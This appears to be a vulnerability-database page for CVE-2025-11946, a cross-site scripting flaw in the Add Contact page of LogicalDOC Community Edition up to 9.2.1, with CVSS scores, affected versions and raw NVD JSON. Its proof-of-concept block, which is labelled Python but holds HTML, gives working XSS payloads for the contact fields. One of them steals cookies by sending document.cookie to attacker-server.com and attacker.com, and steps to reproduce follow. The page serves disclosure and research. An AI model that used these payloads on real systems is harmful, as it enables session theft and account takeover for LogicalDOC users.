Security Vulnerability Report
中文
CVE-2025-11946 CVSS 3.5 LOW

CVE-2025-11946

Published: 2025-10-19 22:15:37
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in LogicalDOC Community Edition up to 9.2.1. This issue affects some unknown processing of the file /frontend.jsp of the component Add Contact Page. Performing manipulation of the argument First Name/Last Name/Company/Address/Phone/Mobile results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:logicaldoc:logicaldoc:*:*:*:*:community:*:*:* - VULNERABLE
LogicalDOC Community Edition <= 9.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11946 PoC: Reflected XSS in LogicalDOC Community Edition --> <!-- Vulnerable endpoint: /frontend.jsp (Add Contact Page) --> <!-- Vulnerable parameters: First Name, Last Name, Company, Address, Phone, Mobile --> <!-- Method 1: Direct URL-based XSS payload --> <!-- Inject script via First Name parameter --> https://target-logicaldoc.com/frontend.jsp?action=add_contact&firstName=<script>alert(document.cookie)</script>&lastName=test&company=test&address=test&phone=test&mobile=test <!-- Method 2: Event handler-based payload via Phone parameter --> https://target-logicaldoc.com/frontend.jsp?action=add_contact&firstName=test&lastName=test&company=test&address=test&phone="><img src=x onerror=alert('XSS')>&mobile=test <!-- Method 3: SVG-based payload via Company parameter --> https://target-logicaldoc.com/frontend.jsp?action=add_contact&firstName=test&lastName=test&company=<svg/onload=alert(document.domain)>&address=test&phone=test&mobile=test <!-- Method 4: Cookie stealing payload via Mobile parameter --> <script> var img = new Image(); img.src = 'https://attacker-server.com/steal?cookie=' + document.cookie; </script> <!-- URL: https://target-logicaldoc.com/frontend.jsp?action=add_contact&firstName=test&lastName=test&company=test&address=test&phone=test&mobile=<script>var i=new Image();i.src='https://attacker.com/steal?c='+document.cookie;</script> --> <!-- Steps to Reproduce: --> <!-- 1. Login to LogicalDOC Community Edition as a low-privilege user --> <!-- 2. Navigate to Add Contact page (/frontend.jsp) --> <!-- 3. In any of the fields (First Name, Last Name, Company, Address, Phone, Mobile), input XSS payload --> <!-- 4. Submit the form or trigger the page rendering --> <!-- 5. Observe that the injected script executes in the browser context -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11946", "sourceIdentifier": "[email protected]", "published": "2025-10-19T22:15:36.863", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in LogicalDOC Community Edition up to 9.2.1. This issue affects some unknown processing of the file /frontend.jsp of the component Add Contact Page. Performing manipulation of the argument First Name/Last Name/Company/Address/Phone/Mobile results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:logicaldoc:logicaldoc:*:*:*:*:community:*:*:*", "versionEndIncluding": "9.2.1", "matchCriteriaId": "F2EFFB66-DBD0-47C8-B668-9627FF48DE8E"}]}]}], "references": [{"url": "https://gist.github.com/thezeekhan/231d87163fbb84f94c9c94f13b88db90", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/thezeekhan/231d87163fbb84f94c9c94f13b88db90#steps-to-reproduce", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329026", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329026", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671389", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entr ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.